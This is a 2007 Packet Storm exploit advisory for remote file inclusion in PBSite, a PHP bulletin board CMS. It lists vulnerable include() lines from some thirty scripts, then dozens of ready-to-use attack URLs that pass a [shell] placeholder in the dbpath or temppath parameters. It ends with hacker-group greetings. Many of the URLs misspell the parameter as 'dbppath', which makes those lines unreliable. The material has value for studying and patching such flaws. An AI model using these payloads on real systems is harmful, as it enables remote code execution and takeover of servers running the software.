pbsite-rfi.txt

2007-06-06T00:00:00
ID PACKETSTORM:57023
Type packetstorm
Reporter Titanichacker
Modified 2007-06-06T00:00:00

Description

                                        
                                            `  
_ _ _ _  
.-" "-.  
/ \  
| TiTaNiC |  
|, .-. .-. ,|  
| )(_o/ \o_)( |  
|/ /\ \|  
(@_ (_ ^^ _)  
_ ) \_______\__|IIIIII|__/_______________________________  
(_)@8@8{}<________|-\IIIIII/-|________________________________>  
)_/ \ HaCkEr /  
(@  
  
  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
script:PBSite - PHP Bulletin Site | CMS ====> RFI  
  
url:http://sourceforge.net/project/showfiles.php?group_id=88114  
  
authot:titanichacker (the-modest-pirate@hotmail.com)  
  
contact: hack-teach.com & mohandko.com & tryag.com  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
bug in: %%%  
%%%%%%%%%%%  
./useronline.php  
include($dbpath."/settings.php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%  
./ucp.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%  
./setcookie.php  
include($temppath."/pb/language/lang_".$language.".php");  
include($dbpath.'/settings.php');  
%%%%%%%%%%  
./sendpm.php  
include($dbpath."/settings.php");  
%%%%%%%%%%%  
./search.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%  
./register.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%  
./profile.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%%%  
./post.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
include($temppath."/pb/language/lang_".$language.".php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%  
./pmpshow.php  
  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%%%  
./pm.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%%  
./ntopic.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%  
./nreply.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
include($temppath."/pb/language/lang_".$language.".php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%  
./news.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%%  
./memberslist.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%%%%%%  
./logout.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%%%%%  
./login.php  
include($dbpath."/settings.php");  
include_once("$temppath/$template/language/lang_$language.php");  
include_once("$temppath/$template/language/lang_$language.php");  
%%%%%%%%%%%%%%%%%%%%%%%%%  
./index.php  
include($dbpath."/settings.php");  
include_once("$temppath/$template/language/lang_$language.php");  
include_once("$temppath/$template/language/lang_$language.php");  
%%%%%%%%%%%%%%%%%  
./help.php  
include($dbpath."/settings.php");  
include_once($dbpath."/settings/styles/styles.php");  
include("$temppath/$template/language/lang_$language.php");  
%%%%%%%%%%%%%  
./forum.php  
include($dbpath."/settings.php");  
include($temppath."/pb/language/lang_$language.php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%  
./error.php  
include($dbpath."/settings.php");  
include($temppath."/pb/language/lang_$language.php");  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%  
./editpost.php  
include($dbpath."/settings.php");  
%%%%%%%%%%%%  
./delpost.php  
include($dbpath."/settings.php");  
%%%%%%%%%%  
./delpm.php  
include($dbpath."/settings.php");  
include("$temppath/pb/language/lang_$language.php");  
%%%%%%%%%%%%  
./confirm.php  
  
include($dbpath."/settings.php");  
  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%%  
./board.php  
include($dbpath."/settings.php");  
  
include($temppath."/pb/language/lang_".$language.".php");  
%%%%%%%%%%%%%%%%  
./admin2.php  
include($dbpath."/settings.php");  
%%%%%%%%%%%%%%%%%%  
./admin.php  
include($dbpath."/settings.php");  
include($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%%%%%%  
./templates/pb/css/formstyles.php  
include ($dbpath."/settings/styles/styles.php");  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
exploit:%%  
%%%%%%%%%  
http://victim/path/useronline.php?dbpath=[shell]  
http://victim/path/useronline.php?temppath=[shell]  
%%%%%  
http://victim/path/ucp.php?dbpath=[shell]  
%%%%%  
http://victim/path/setcookie.php?temppath=[shell]  
http://victim/path/setcookie.php?dbppath=[shell]  
%%%%%  
http://victim/path/sendpm.php?dbppath=[shell]  
%%%%%%%  
http://victim/path/search.php?dbppath=[shell]  
http://victim/path/search.php?temppath=[shell]  
%%%%%%%%%  
http://victim/path/register.php?dbppath=[shell]  
http://victim/path/register.php?temppath=[shell]  
%%%%%%%%%%  
http://victim/path/profile.php?dbpath=[shell]  
%%%%%%%%  
http://victim/path/post.php?dbppath=[shell]  
http://victim/path/post.php?temppath=[shell]  
%%%%%%%%%  
http://victim/path/pmpshow.php?dbppath=[shell]  
%%%%%%%%%%%  
http://victim/path/pm.php?dbppath=[shell]  
%%%%%%%%%%%%  
http://victim/path/ntopic.php?dbppath=[shell]  
%%%%%%%%  
http://victim/path/nreply.php?dbppath=[shell]  
http://victim/path/nreply.php?temppath=[shell]  
%%%%%%%%%%%%  
http://victim/path/news.php?dbppath=[shell]  
http://victim/path/news.php?temppath=[shell]  
%%%%%%%%%%%  
http://victim/path/memberslist.php?dbppath=[shell]  
%%%%%%%%%%%%%%  
http://victim/path/logout.php?dbppath=[shell]  
http://victim/path/logout.php?temppath=[shell]  
%%%%%%%%%%%%%%%%%%  
http://victim/path/login.php?dbppath=[shell]  
http://victim/path/login.php?temppath=[shell]  
%%%%%%%%%%%%%%%%%  
http://victim/path/index.php?dbppath=[shell]  
http://victim/path/index.php?temppath=[shell]  
%%%%%%%%%%%%%  
http://victim/path/help.php?dbppath=[shell]  
http://victim/path/help.php?temppath=[shell]  
%%%%%%%%%%  
http://victim/path/forum.php?dbppath=[shell]  
http://victim/path/forum.php?temppath=[shell]  
%%%%%%%%%%%  
http://victim/path/error.php?dbppath=[shell]  
http://victim/path/error.php?temppath=[shell]  
%%%%%%%%%%%  
http://victim/path/editpost.php?dbppath=[shell]  
%%%%%%%%%%  
http://victim/path/delpost.php?dbppath=[shell]  
%%%%%%%%%%%  
http://victim/path/delpm.php?dbppath=[shell]  
http://victim/path/delpm.php?temppath=[shell]  
%%%%%%%%%%%  
http://victim/path/confirm.php?dbppath=[shell]  
http://victim/path/confirm.php?temppath=[shell]  
%%%%%%%%%%%  
http://victim/path/board.php?dbppath=[shell]  
http://victim/path/board.php?temppath=[shell]  
%%%%%%%%%%%  
http://victim/path/admin2.php?dbppath=[shell]  
%%%%%%%%%%%  
http://victim/path/admin.php?dbppath=[shell]  
%%%%%%%%%%%%  
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
  
%%%%%%%%%%%%%%%%%%%%  
thanx  
%%%%%%%%%  
cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 &   
milw0rm & xp10  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  
  
_________________________________________________________________  
Express yourself instantly with MSN Messenger! Download today it's FREE!   
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/  
  
`